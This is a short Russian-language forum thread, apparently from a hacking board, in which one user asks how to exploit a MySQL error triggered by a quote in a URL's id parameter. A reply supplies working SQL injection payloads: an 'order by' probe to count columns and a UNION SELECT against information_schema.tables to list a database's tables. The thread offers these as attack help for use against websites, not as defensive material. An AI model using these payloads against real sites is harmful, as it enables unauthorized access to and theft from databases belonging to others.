Saiga
Там дальше комментарии.
Писал я это для того, что-бы показать , что вывод ВОЗМОЖЕН, но не везде разумеется.
Тоесть никто не говорил, что при двойных запросах 100% будет вывод
Доброго времени суток всем.
Подскажите пож. как примерно должен выглядеть запрос ,если ошибка в Mysql выводится при подстановке запятой вот так:
site.com/bla.php?id='5
Интересует именно конструкция запроса.
Заранее благодарен за ответ.
Grookle, сотни раз уже писано-переписано
Подбор колонок: site.com/bla.php?id=5+order+by+1000/*
Sql-Inj: site.com/bla.php?id=-999+union+select+1,2,table_name,4,5+from+informati on_schema.tables/*